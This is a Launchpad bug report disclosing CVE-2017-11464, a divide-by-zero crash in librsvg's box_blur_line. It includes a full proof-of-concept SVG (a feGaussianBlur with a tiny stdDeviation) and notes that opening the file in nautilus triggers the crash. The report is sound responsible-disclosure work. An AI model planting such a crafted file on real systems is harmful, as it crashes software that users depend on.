Ubuntu
librsvg package

Denial of Service Vulnerability in Librsvg

Bug #1697283 reported by gnehsoah on 2017-06-11

256

This bug affects 1 person

Affects		Status	Importance	Assigned to	Milestone
	librsvg (Ubuntu)	Confirmed	Undecided	Unassigned

Bug Description

An SIGFPE is raised in function box_blur_line of rsvg-filter.c when the librsvg try to parse a craft SVG file.

https://github.com/GNOME/librsvg/blob/master/rsvg-filter.c#L1439

if (output >= 0)
dest[bpp * output + i] = (ac[i] + (coverage >> 1)) / coverage;
}

The coverage could be zero.

testcase.svg

<svg width="100" height="120"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink">

  <filter id="blurMe">
    <feGaussianBlur in="SourceGraphic" stdDeviation="0.053192302807822195 20" />
  </filter>

<circle cx="50" cy="50" r="50" fill="green"
filter="url(#blurMe)" />
</svg>

CVE References

2017-11464

Revision history for this message

gnehsoah (gnehsoah) wrote on 2017-06-11:

#1

crash.png Edit (299.4 KiB, image/png)

Revision history for this message

gnehsoah (gnehsoah) wrote on 2017-06-11:

#2

testcase.svg Edit (317 bytes, image/svg+xml)

Revision history for this message

gnehsoah (gnehsoah) wrote on 2017-06-11:

#3

The way to trigger this vulnerability is to use nautilus to open testcase.svg.

Revision history for this message

Seth Arnold (seth-arnold) wrote on 2017-06-15:

#4

Thanks, I've filed https://bugzilla.gnome.org/show_bug.cgi?id=783835 for this.

Revision history for this message

Seth Arnold (seth-arnold) wrote on 2017-06-27:

#5

https://git.gnome.org/browse/librsvg/commit/?id=ecf9267a24b2c3c0cd211dbdfa9ef2232511972a

Thanks

Revision history for this message

Marc Deslauriers (mdeslaur) wrote on 2017-08-18:

#6

Hi! Can I make this bug, including your test case public?

Thanks!

Revision history for this message

gnehsoah (gnehsoah) wrote on 2017-08-18: Re: [Bug 1697283] Re: Denial of Service Vulnerability in Librsvg

#7

Yes, you can.

2017-08-18 20:08 GMT+08:00 Marc Deslauriers <email address hidden>
:

> Hi! Can I make this bug, including your test case public?
>
> Thanks!
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1697283
>
> Title:
> Denial of Service Vulnerability in Librsvg
>
> Status in librsvg package in Ubuntu:
> New
>
> Bug description:
> An SIGFPE is raised in function box_blur_line of rsvg-filter.c when
> the librsvg try to parse a craft SVG file.
>
> https://github.com/GNOME/librsvg/blob/master/rsvg-filter.c#L1439
>
> if (output >= 0)
> dest[bpp * output + i] = (ac[i] + (coverage >> 1)) / coverage;
> }
>
> The coverage could be zero.
>
> testcase.svg
>
> <svg width="100" height="120"
> xmlns="http://www.w3.org/2000/svg"
> xmlns:xlink="http://www.w3.org/1999/xlink">
>
> <filter id="blurMe">
> <feGaussianBlur in="SourceGraphic" stdDeviation="0.053192302807822195
> 20" />
> </filter>
>
> <circle cx="50" cy="50" r="50" fill="green"
> filter="url(#blurMe)" />
> </svg>
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/ubuntu/+source/librsvg/+bug/
> 1697283/+subscriptions
>

Marc Deslauriers (mdeslaur) on 2017-08-18

information type:	Private Security → Public Security
Changed in librsvg (Ubuntu):
status:	New → Confirmed

Report a bug

This report contains Public Security information

Everyone can see this security related information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Bug attachments

Add attachment

Remote bug watches

gnome-bugs #783835 Edit

Bug watches keep track of this bug in other bug trackers.